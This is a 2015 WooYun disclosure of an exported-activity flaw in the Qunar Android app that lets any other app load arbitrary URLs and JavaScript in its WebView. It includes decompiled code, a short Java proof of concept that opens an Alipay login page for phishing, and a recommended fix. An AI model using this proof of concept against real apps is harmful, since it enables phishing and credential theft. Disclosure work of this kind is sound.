当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135403

漏洞标题:去哪儿安卓客户端组件暴露可实现钓鱼

相关厂商:去哪儿

漏洞作者: hh88

提交时间:2015-08-20 10:18

修复时间:2015-11-19 16:02

公开时间:2015-11-19 16:02

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-20: 细节已通知厂商并且等待厂商处理中
2015-08-21: 厂商已经确认,细节仅向厂商公开
2015-08-24: 细节向第三方安全合作伙伴开放
2015-10-15: 细节向核心白帽子及相关领域专家公开
2015-10-25: 细节向普通白帽子公开
2015-11-04: 细节向实习白帽子公开
2015-11-19: 细节向公众公开

简要描述:

去哪儿安卓客户端容易出现钓鱼

详细说明:

组件com.mqunar.dispatcher.DispatcherActivity暴露给第三方应用(不用root)就可利用uri其执行WebView.
在manifest文件中 <activity android:configChanges="keyboardHidden|orientation" android:name="com.mqunar.dispatcher.DispatcherActivity" android:screenOrientation="portrait" android:theme="@android:style/Theme.Translucent.NoTitleBar">
反编译后代码
protected void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
QunarApkLoader.loadResourceWithoutBroadcast(this);
requestWindowFeature(1);
if (paramBundle == null) {
DispatcherLogic.processIntent(this, getIntent());
}
}
在DispatcherLogic中从方法processIntent到a
private static void a(Object paramObject, Intent paramIntent, Uri paramUri, boolean paramBoolean)
{
if (paramBoolean) {}
for (;;)
{
try
{
Uri localUri1 = Uri.parse("http://touch.qunar.com/appredirect?url=" + URLEncoder.encode(paramUri.toString(), "UTF-8"));
QLog.d("spider", "openWebView url is " + paramUri, new Object[0]);
paramUri = new Intent();
paramUri.putExtras(paramIntent);
paramUri.putExtra("url", localUri1.toString());
paramUri.setClass(a(paramObject), WebActivity.class);
paramUri.addFlags(268435456);
c(paramObject, paramUri);
b(paramObject);
return;
}
catch (UnsupportedEncodingException localUnsupportedEncodingException) {}
Uri localUri2 = paramUri;
}
}

漏洞证明:

利用它来打开支付宝登录界面,
编写POC代码 或用am命令也可以

public static void DispatcherActivity_poc(Context context){
Intent intent=new Intent();
String str="http://auth.alipay.com";
Uri uri = Uri.parse(str);
intent.putExtra("_RESULT_BROADCAST_MESSAGE_ACTION_", "xxxxxxx");
intent.setData(uri);
intent.setClassName("com.Qunar", "com.mqunar.dispatcher.DispatcherActivity");
context.startActivity(intent);
}


可以钓鱼啦,操纵url访问任意网页,还可执行javascript代码,可以干的事很多,不一一列举了

aliplay.JPG

修复方案:

该Activity组件设为exported:false,或者禁止第三方应用传入appUrl。

版权声明:转载请注明来源 hh88@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-21 16:01

厂商回复:

感谢关注去哪儿网安全,已经安排业务同学进行处理。

最新状态:

暂无